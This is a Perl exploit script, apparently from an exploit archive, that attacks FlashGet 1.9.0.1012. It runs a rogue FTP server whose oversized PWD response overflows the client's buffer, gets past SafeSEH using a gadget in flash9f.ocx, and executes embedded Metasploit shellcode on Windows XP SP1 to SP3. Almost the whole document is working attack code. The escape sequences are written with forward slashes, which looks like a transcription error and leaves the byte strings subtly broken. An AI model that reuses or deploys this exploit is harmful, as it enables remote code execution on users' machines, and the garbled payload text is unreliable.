FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

1. #!/usr/bin/perl
2. # k`sOSe 08/17/2008
3. # bypass safeseh using flash9f.ocx.
5. use warnings;
6. use strict;
7. use IO::Socket;
9. # win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
10. my $shellcode = 
11. "/x31/xc9/x83/xe9/xde/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/x6b".
12. "/xa3/x03/x10/x83/xeb/xfc/xe2/xf4/x97/x4b/x47/x10/x6b/xa3/x88/x55".
13. "/x57/x28/x7f/x15/x13/xa2/xec/x9b/x24/xbb/x88/x4f/x4b/xa2/xe8/x59".
14. "/xe0/x97/x88/x11/x85/x92/xc3/x89/xc7/x27/xc3/x64/x6c/x62/xc9/x1d".
15. "/x6a/x61/xe8/xe4/x50/xf7/x27/x14/x1e/x46/x88/x4f/x4f/xa2/xe8/x76".
16. "/xe0/xaf/x48/x9b/x34/xbf/x02/xfb/xe0/xbf/x88/x11/x80/x2a/x5f/x34".
17. "/x6f/x60/x32/xd0/x0f/x28/x43/x20/xee/x63/x7b/x1c/xe0/xe3/x0f/x9b".
18. "/x1b/xbf/xae/x9b/x03/xab/xe8/x19/xe0/x23/xb3/x10/x6b/xa3/x88/x78".
19. "/x57/xfc/x32/xe6/x0b/xf5/x8a/xe8/xe8/x63/x78/x40/x03/x53/x89/x14".
20. "/x34/xcb/x9b/xee/xe1/xad/x54/xef/x8c/xc0/x62/x7c/x08/xa3/x03/x10";
22. my @targets = ( "/x82/x01/x02/x30", "/x82/x01/x02/x30", "/x0b/x02/x01/x30" );
24. if( !defined($ARGV[0]) or $ARGV[0] !~ /^(1|2|3)$/ )
25. {
26.     usage();
27. }
29. $ARGV[0]--;
31. my $sock = IO::Socket::INET->new( 
32.                     LocalAddr => '0.0.0.0', 
33.                     LocalPort => '21', 
34.                     Listen => 1, 
35.                     Reuse => 1 
36.                     ) || die($!);
38. while(my $csock = $sock->accept())
39. {
41.     print $csock "220 Hello ;)/r/n"; 
42.     read_sock($csock);
44.     print $csock "331 pwd please/r/n";
45.     read_sock($csock);
47.     print $csock "230 OK/r/n";
48.     read_sock($csock);
50.     print $csock "250 CWD command successful./r/n";
51.     read_sock($csock);
53.     print $csock    "257 " . "/x22" . 
54.             "/x41" x 324 . 
56.             "/xEB/x06/x90/x90" . # jump ahead
57.             $targets[$ARGV[0]] . # pop,pop,ret @ flash9f.ocx, thanks macromedia for avoiding /SAFESEH  ;)
59.             $shellcode .
61.             "/x90" x 840 .
62.             "/x22" .
63.             " is current directory./r/n";
64.         
65.     close($csock);
66.     exit;
67. }
71. sub read_sock
72. {
73.     my ($sock) = @_;
75.     my $buf = <$sock>;
77.     print "[client] -> $buf";
79. }
81. sub usage
82. {
83.     print "usage: $0 [1,2,3]
84.   1 -> Windows XP SP1
85.   2 -> Windows XP SP2
86.   3 -> Windows XP SP3/n";
87.     exit;
88. }